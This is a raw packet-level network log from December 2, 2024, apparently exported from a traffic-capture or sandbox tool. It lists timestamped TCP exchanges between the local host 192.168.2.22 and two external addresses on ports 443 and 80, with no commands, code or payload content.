                                                  Dec 2, 2024 07:25:19.829503059 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.829535961 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.829571009 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.829626083 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.832072020 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.832079887 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.832103968 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.832129002 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.832159996 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.835467100 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.835474014 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.835490942 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.835517883 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.835544109 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.838129044 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.838135958 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.838160038 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.838188887 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.838219881 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.841495037 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.841502905 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.841528893 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.841558933 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.841584921 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.844110012 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.844116926 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.844173908 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.844199896 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.846785069 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.846791983 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.846843004 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.846863031 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.850167990 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.850174904 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.850235939 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.850258112 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.852729082 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.852735996 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.852787971 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.852812052 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.855438948 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.855469942 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.855496883 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.855523109 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.855566978 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.858437061 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.858443975 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.858501911 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.858530998 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.861824036 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.861881018 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.861912012 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.864391088 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.864448071 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.864474058 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.867187023 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.867254019 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.867280960 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.869589090 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.869622946 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.869635105 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:19.870436907 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.870493889 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.870527029 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.874017954 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.874066114 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:19.976656914 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.976783991 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.976838112 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:19.980842113 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.980885029 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.980931044 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:19.989236116 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.989376068 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.989423990 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:19.997714043 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.997780085 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:19.997823954 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.006077051 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.006171942 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.006213903 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.014601946 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.014714003 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.014756918 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.022927046 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.023066998 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.023123026 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.028352976 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.028415918 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.028443098 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.030632019 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.030641079 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.030666113 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.030685902 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.030695915 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.030746937 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.031299114 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.031368017 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.031410933 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.033972979 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.033981085 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.034004927 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.034029007 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.034046888 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.036655903 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.036664963 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.036689043 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.036710024 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.036732912 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.039263964 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.039273977 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.039295912 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.039339066 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.039339066 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.039697886 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.039814949 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.039865017 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.042618990 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.042630911 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.042646885 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.042668104 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.042680025 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.045398951 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.045407057 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.045450926 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.045465946 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.047822952 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.047831059 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.047877073 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.047887087 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.048127890 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.048196077 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.048238993 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.051287889 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.051296949 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.051338911 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.051348925 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.051393032 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.054177046 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.054186106 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.054230928 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.054239035 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.056579113 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.056720018 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.056765079 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.057437897 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.057491064 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.057497978 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.059896946 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.059947014 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.059958935 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.062939882 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.062993050 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.062999964 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.065642118 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.065696955 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.065705061 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.068236113 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.068295956 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.068303108 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.071576118 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.071630955 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.071638107 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.198370934 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.198491096 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.198574066 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.201555014 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.201644897 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.201689005 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.207096100 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.207170010 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.207217932 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.212879896 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.212893963 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.212939024 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.218813896 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.218914032 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.219065905 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.224504948 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.224613905 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.224653959 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.229718924 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.229794979 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.229821920 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.230281115 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.230407000 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.230453968 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.232537031 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.232546091 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.232568026 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.232610941 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.232652903 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.232700109 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.235250950 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.235259056 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.235292912 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.235340118 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.235340118 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.236150026 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.236161947 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.236203909 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.237829924 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.237838030 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.237859011 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.237895966 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.237920046 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.241158962 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.241166115 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.241194010 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.241242886 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.241242886 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.241908073 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.241991043 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.664710045 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.666373968 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.666501045 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.666549921 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.667629004 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.667711020 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.667722940 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.668227911 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.668369055 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.668418884 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.670018911 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.670124054 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.670172930 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.670202971 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.670255899 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.670264006 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.671909094 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.672008038 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.672055960 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.672852993 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.672905922 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.672914982 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.673672915 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.673717976 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.673764944 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.675543070 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.675554037 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.675595999 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.676207066 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.676265001 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.676275015 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.677321911 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.677333117 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.677375078 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.679121017 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.679243088 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.679289103 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.680933952 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.681143999 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.681194067 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.682749033 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.682873964 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.682930946 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.684571981 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.684688091 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.684736967 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.686386108 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.686502934 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.686549902 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.688205957 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.688322067 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.688386917 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.690028906 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.690114021 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.690161943 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.691910982 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.692086935 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.692133904 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.762826920 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.762852907 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.762917042 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.764355898 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.764470100 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.764518976 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.767720938 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.767740011 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.767785072 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.768810034 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.768830061 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.768877029 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.771850109 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.771959066 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.771991968 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.771998882 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.773746967 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.773786068 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.773981094 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.775633097 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.775681973 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.775757074 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.777460098 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.777504921 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.777520895 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.779222012 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.779263973 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.779283047 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.781071901 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.781109095 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.781177044 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.782871962 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.782917023 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.782973051 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.784698963 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.784744978 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.784836054 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.786555052 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.786600113 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.786714077 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.788424015 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.788469076 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.788471937 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.790150881 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.790194035 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.790256023 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.792130947 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.792175055 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.792176962 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.793819904 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.793864965 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.793890953 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.795612097 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.795658112 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.795715094 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.797447920 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.797492027 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.797571898 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.799259901 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.799304962 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.799360037 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.801073074 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.801121950 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.833769083 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.833867073 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.833899975 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.836445093 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.836456060 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.836481094 CET44349172142.215.209.77192.168.2.22
